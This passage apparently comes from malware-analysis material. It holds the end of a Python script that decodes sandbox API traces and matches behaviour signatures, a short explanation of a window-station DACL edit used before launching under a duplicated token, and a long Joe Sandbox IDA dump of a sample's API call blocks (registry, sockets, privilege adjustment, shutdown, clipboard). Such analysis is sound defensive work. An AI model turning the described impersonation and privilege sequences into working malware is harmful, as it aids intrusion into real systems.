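    if api in ("GetClipboardData", "IsClipboardFormatAvailable") and args:
        fmt = _hex(args[0])
        return [CLIPBOARD_FORMATS.get(fmt, f"format={fmt}")]
    if api == "DuplicateTokenEx" and len(args) >= 5:   # (hTok, access, attrs, level, type, ...)
        return [IMPERSONATION_LEVELS.get(_hex(args[3]), "?"),
                TOKEN_TYPES.get(_hex(args[4]), "?")]
    if api == "OpenWindowStationW" and len(args) >= 3:  # (name, inherit, access)
        return [f"name={args[0]}", f"access={access_names(_hex(args[2]) or 0)}"]
    if api == "OpenDesktopW" and len(args) >= 4:        # (name, flags, inherit, access)
        return [f"name={args[0]}", f"access={access_names(_hex(args[3]) or 0)}"]
    return []


def analyze(text):
    """Per block: call site of its first API, matched behaviours, decoded arguments."""
    report = []
    for block in parse_trace(text):
        apis = {c["api"] for c in block}
        hits = sorted(name for name, needed in BEHAVIOURS.items() if needed <= apis)
        notes = [f"{c['api']}@{c['ref']}: " + ", ".join(decode_call(c))
                 for c in block if decode_call(c)]
        report.append({"first_ref": block[0]["ref"] if block else None,
                       "behaviours": hits, "notes": notes})
    return report


if __name__ == "__main__":
    for entry in analyze(SAMPLE_TRACE):
        print(entry["first_ref"], entry["behaviours"])
        for note in entry["notes"]:
            print("   ", note)
```

Arguments shown as `?` are values the sandbox could not resolve at the call site, so the decoder treats them as unknown rather than guessing; the block-level match works on the set of APIs, which is robust to that. The WRITE_DAC request on winsta0 and the default desktop, followed by the DACL edit in the next block, is the part worth surfacing: it is the sequence a process uses to grant another SID access to the interactive window station and desktop before launching a process under a duplicated token.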
                                                                            APIs
                                                                              • Part of subcall function 002F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002F040D,?,?), ref: 002F1491
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002F0B0C
                                                                              • Part of subcall function 00274D37: __itow.LIBCMT ref: 00274D62
                                                                              • Part of subcall function 00274D37: __swprintf.LIBCMT ref: 00274DAC
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002F0BAB
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002F0C43
                                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 002F0E82
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 002F0E8F
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 1240663315-0
                                                                            • Opcode ID: bab720af6d26f5ed759813afc4d78f9bc728c27641d6ecfe148b289a426b3ea0
                                                                            • Instruction ID: f1a8bdf0a98516f7a189fb46e65d5f76b3198c8f8b7e385a4ccaa4b802a2a0c4
                                                                            • Opcode Fuzzy Hash: bab720af6d26f5ed759813afc4d78f9bc728c27641d6ecfe148b289a426b3ea0
                                                                            • Instruction Fuzzy Hash: 84E16E31214215AFCB14DF24C991E2ABBE8EF89754F04896DF949DB2A2DB30ED21CF51
                                                                            APIs
                                                                            • __swprintf.LIBCMT ref: 002D4451
                                                                            • __swprintf.LIBCMT ref: 002D445E
                                                                              • Part of subcall function 002938C8: __woutput_l.LIBCMT ref: 00293921
                                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 002D4488
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 002D4494
                                                                            • LockResource.KERNEL32(00000000), ref: 002D44A1
                                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 002D44C1
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 002D44D3
                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 002D44E2
                                                                            • LockResource.KERNEL32(?), ref: 002D44EE
                                                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 002D454F
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                            • String ID:
                                                                            • API String ID: 1433390588-0
                                                                            • Opcode ID: 105021892b9c1d96b76e446c393ed05480d5d5bac64a562e9ad3e23171463326
                                                                            • Instruction ID: e2066363a8881a15afc2105853eeecc422b7e2d9d805e786c61423640299a409
                                                                            • Opcode Fuzzy Hash: 105021892b9c1d96b76e446c393ed05480d5d5bac64a562e9ad3e23171463326
                                                                            • Instruction Fuzzy Hash: AB319E7151121AABDF16AF60EC98EBB7BACFF04301F404826F956D2250DB74DE21CBA4
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                            • String ID:
                                                                            • API String ID: 1737998785-0
                                                                            • Opcode ID: e76e420c5d57593b1c7496bf9b546208afb9b3b902da54ec6c9d22d3bf37ad9f
                                                                            • Instruction ID: 9313c4d76cd8b873ae2c72cbdfe632fbeab8476eb67c73ae61c1d052f3e1c1e2
                                                                            • Opcode Fuzzy Hash: e76e420c5d57593b1c7496bf9b546208afb9b3b902da54ec6c9d22d3bf37ad9f
                                                                            • Instruction Fuzzy Hash: 2321A1312522519FDB16BF25EC59F2E77ADEF44721F00801AF94A9B2A1CB71AD208F94
                                                                            APIs
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 002DFA83
                                                                            • FindClose.KERNEL32(00000000), ref: 002DFB96
                                                                              • Part of subcall function 002752B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002752E6
                                                                            • Sleep.KERNEL32(0000000A), ref: 002DFAB3
                                                                            • _wcscmp.LIBCMT ref: 002DFAC7
                                                                            • _wcscmp.LIBCMT ref: 002DFAE2
                                                                            • FindNextFileW.KERNEL32(?,?), ref: 002DFB80
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                            • String ID: *.*
                                                                            • API String ID: 2185952417-438819550
                                                                            • Opcode ID: d6b507aa0b166fa5cf6196433ea6091e0ce68ab925ecc03e240ed065ef714e8e
                                                                            • Instruction ID: 651ec1eeab0415f19a04a7c8c7f53fb0980b8838d41d80333eac5b331c3530bc
                                                                            • Opcode Fuzzy Hash: d6b507aa0b166fa5cf6196433ea6091e0ce68ab925ecc03e240ed065ef714e8e
                                                                            • Instruction Fuzzy Hash: 3241B17592121A9FCF55DF64CD58AEEBBB8FF09300F144067E819A2291EB309E64CF90
                                                                            APIs
                                                                              • Part of subcall function 002C9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002C93E3
                                                                              • Part of subcall function 002C9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002C9410
                                                                              • Part of subcall function 002C9399: GetLastError.KERNEL32 ref: 002C941D
                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 002D57B4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                            • String ID: $@$SeShutdownPrivilege
                                                                            • API String ID: 2234035333-194228
                                                                            • Opcode ID: ea19ebda6f380de72f9d67062bed9edf1f6293a51be51cae1f0969c630e05e3c
                                                                            • Instruction ID: 59e81a8d8658d9ae59aa4ad103f8d637f95a18a0e838cf3257917cb6d0fe7d5a
                                                                            • Opcode Fuzzy Hash: ea19ebda6f380de72f9d67062bed9edf1f6293a51be51cae1f0969c630e05e3c
                                                                            • Instruction Fuzzy Hash: B501F731775733EAF7286A649C8AFBBF25CAB04750F34052BF953D62D2DAD05C208550
                                                                            APIs
                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 002E69C7
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 002E69D6
                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 002E69F2
                                                                            • listen.WSOCK32(00000000,00000005), ref: 002E6A01
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 002E6A1B
                                                                            • closesocket.WSOCK32(00000000,00000000), ref: 002E6A2F
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                                            • String ID:
                                                                            • API String ID: 1279440585-0
                                                                            • Opcode ID: a242988d9c3b8499c884753c2b01ea84812558247c809cb1c25eb5ef5b37014c
                                                                            • Instruction ID: 6817465e98b87cd1526535bb614afbaec6779d827a60db7ddb747aa6d8e8c071
                                                                            • Opcode Fuzzy Hash: a242988d9c3b8499c884753c2b01ea84812558247c809cb1c25eb5ef5b37014c
                                                                            • Instruction Fuzzy Hash: 9C21DD30650201AFCB10EF68C999B3EB7A9EF48720F148159E95AA7392CB70AC11CF91
                                                                            APIs
                                                                              • Part of subcall function 002729E2: GetWindowLongW.USER32(?,000000EB), ref: 002729F3
                                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00271DD6
                                                                            • GetSysColor.USER32(0000000F), ref: 00271E2A
                                                                            • SetBkColor.GDI32(?,00000000), ref: 00271E3D
                                                                              • Part of subcall function 0027166C: DefDlgProcW.USER32(?,00000020,?), ref: 002716B4
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ColorProc$LongWindow
                                                                            • String ID:
                                                                            • API String ID: 3744519093-0
                                                                            • Opcode ID: 232270a2e63c76f9ec71a075de32e6eb84f42d83da35d5ad860cf8623c1937d8
                                                                            • Instruction ID: 7121b646820cf5bca2d049f07314f8be803260807f1d7f1f49e854d2f29691a2
                                                                            • Opcode Fuzzy Hash: 232270a2e63c76f9ec71a075de32e6eb84f42d83da35d5ad860cf8623c1937d8
                                                                            • Instruction Fuzzy Hash: FDA145B413540ABBD73A6E6D8C49E7B255EDF43301F24811BF40AC6192CE708D31DAB6
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 002DC329
                                                                            • _wcscmp.LIBCMT ref: 002DC359
                                                                            • _wcscmp.LIBCMT ref: 002DC36E
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 002DC37F
                                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 002DC3AF
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File_wcscmp$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 2387731787-0
                                                                            • Opcode ID: 6bbf40bd55b4c4bf1f8791b38a9f4d31fd30bf3c8b59839c57d6aaadb864c022
                                                                            • Instruction ID: ccf62fd378a34b4f490029256017f6ab1f9e89d56c0f44e1dc87040dce724a02
                                                                            • Opcode Fuzzy Hash: 6bbf40bd55b4c4bf1f8791b38a9f4d31fd30bf3c8b59839c57d6aaadb864c022
                                                                            • Instruction Fuzzy Hash: 18517E756246028FD714DF68D490EAAB3E8EF49310F20465EF95AC73A1DB30AD25CF91
                                                                            APIs
                                                                              • Part of subcall function 002E8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002E84A0
                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 002E6E89
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 002E6EB2
                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 002E6EEB
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 002E6EF8
                                                                            • closesocket.WSOCK32(00000000,00000000), ref: 002E6F0C
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 99427753-0
                                                                            • Opcode ID: 4f7e0d43f03abf1a5110b66921180ea4b72c6e0c832cce93a5a5b48931bea0b4
                                                                            • Instruction ID: e4b7f0c99e64057bfdeb4536e03898a69b0456f022a10acd3d044d2dcbba5e11
                                                                            • Opcode Fuzzy Hash: 4f7e0d43f03abf1a5110b66921180ea4b72c6e0c832cce93a5a5b48931bea0b4
                                                                            • Instruction Fuzzy Hash: E441E375660200AFDB10BF64D886F7E73A89B04714F44C558F949AB3C2CB709D208FA1
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                            • String ID:
                                                                            • API String ID: 292994002-0
                                                                            • Opcode ID: d8ec0efbb1b626f976a9c2c369a912927536b9d2bdfbd6a32c4ec2b5bea3a09d
                                                                            • Instruction ID: 69b7fc4c171e2ea5c590b727d8e7cb1dd2ae1f81cfdf6b8750a425cf988e6294
                                                                            • Opcode Fuzzy Hash: d8ec0efbb1b626f976a9c2c369a912927536b9d2bdfbd6a32c4ec2b5bea3a09d
                                                                            • Instruction Fuzzy Hash: C511E6313219269FE7261F268C84B3AB79DEF447A0F00413AEA4AD7241CB70AD218ED0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: LocalTime__swprintf
                                                                            • String ID: %.3d$WIN_XPe
                                                                            • API String ID: 2070861257-2409531811
                                                                            • Opcode ID: 12f62edcda256671075dc9b0dbc98903c511526cdbaebed74dd3d658dd788267
                                                                            • Instruction ID: 00d9e6258627725737f161aaede4964e3ec2ebfc17e220c5b29c46f452aa2527
                                                                            • Opcode Fuzzy Hash: 12f62edcda256671075dc9b0dbc98903c511526cdbaebed74dd3d658dd788267
                                                                            • Instruction Fuzzy Hash: 52D01271834118EACB0AAA90C8C4EFB737CFB04344F144852F506A2040D2B597A8AB26
                                                                            APIs
                                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,002E1ED6,00000000), ref: 002E2AAD
                                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 002E2AE4
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                                            • String ID:
                                                                            • API String ID: 599397726-0
                                                                            • Opcode ID: accae122b5c0025adfc97e5eefae0b939fbe12c892638175ed5448164f8c2368
                                                                            • Instruction ID: 0c6b0dcf0be5d2ada7a349eba58dc91816d23cbcd23d160addcf0909d94864fe
                                                                            • Opcode Fuzzy Hash: accae122b5c0025adfc97e5eefae0b939fbe12c892638175ed5448164f8c2368
                                                                            • Instruction Fuzzy Hash: 53412B7166024AFFEB20DE56CC81FBB73BCEB40714F50402EF606A3241D6B19E659B60
                                                                            APIs
                                                                              • Part of subcall function 00290FE6: std::exception::exception.LIBCMT ref: 0029101C
                                                                              • Part of subcall function 00290FE6: __CxxThrowException@8.LIBCMT ref: 00291031
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002C93E3
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002C9410
                                                                            • GetLastError.KERNEL32 ref: 002C941D
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 1922334811-0
                                                                            • Opcode ID: 001496ec5945f6626fe23fd30a5d3329b7bd413e81300468d2093b279496cdf5
                                                                            • Instruction ID: 13acba64fb0f6ff1c5141e25f106923ad77556c45913ac4f2bffc9d390ced9e7
                                                                            • Opcode Fuzzy Hash: 001496ec5945f6626fe23fd30a5d3329b7bd413e81300468d2093b279496cdf5
                                                                            • Instruction Fuzzy Hash: ED118FB2424209AFD728DF64DCC9E2BB7BCFB44710B20866EF45993640EB70AC51CB64
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002D4271
                                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 002D42B2
                                                                            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002D42BD
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                            • String ID:
                                                                            • API String ID: 33631002-0
                                                                            • Opcode ID: f13dee96c0085d9bdd0470fb8b4c35e94706758093271fa5ac504ccca360a983
                                                                            • Instruction ID: 59f84b713879cab1d4570cd31b5134a11a5cb405ff5e278157c2a847bb48e224
                                                                            • Opcode Fuzzy Hash: f13dee96c0085d9bdd0470fb8b4c35e94706758093271fa5ac504ccca360a983
                                                                            • Instruction Fuzzy Hash: F7113C75E01228BBDB159FA5AC49BAFBBBCEB45B60F104156FD04E7290C6705E018BA1
                                                                            APIs
                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 002D4F45
                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002D4F5C
                                                                            • FreeSid.ADVAPI32(?), ref: 002D4F6C
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                            • String ID:
                                                                            • API String ID: 3429775523-0
                                                                            • Opcode ID: fa7c284fdd5899b5d8f4031e8d3006579ee7dea3e1064b3cd003374e48f87508
                                                                            • Instruction ID: 6e40ba09a8cb15da5c17fe87d7f8f70e38dedec18f45bb0c6fdac94fed4fb43d
                                                                            • Opcode Fuzzy Hash: fa7c284fdd5899b5d8f4031e8d3006579ee7dea3e1064b3cd003374e48f87508
                                                                            • Instruction Fuzzy Hash: B8F04F7591130DBFDF04DFE0DC99EAEB7BCEF08301F004469A501E2580D7345A048B50
                                                                            APIs
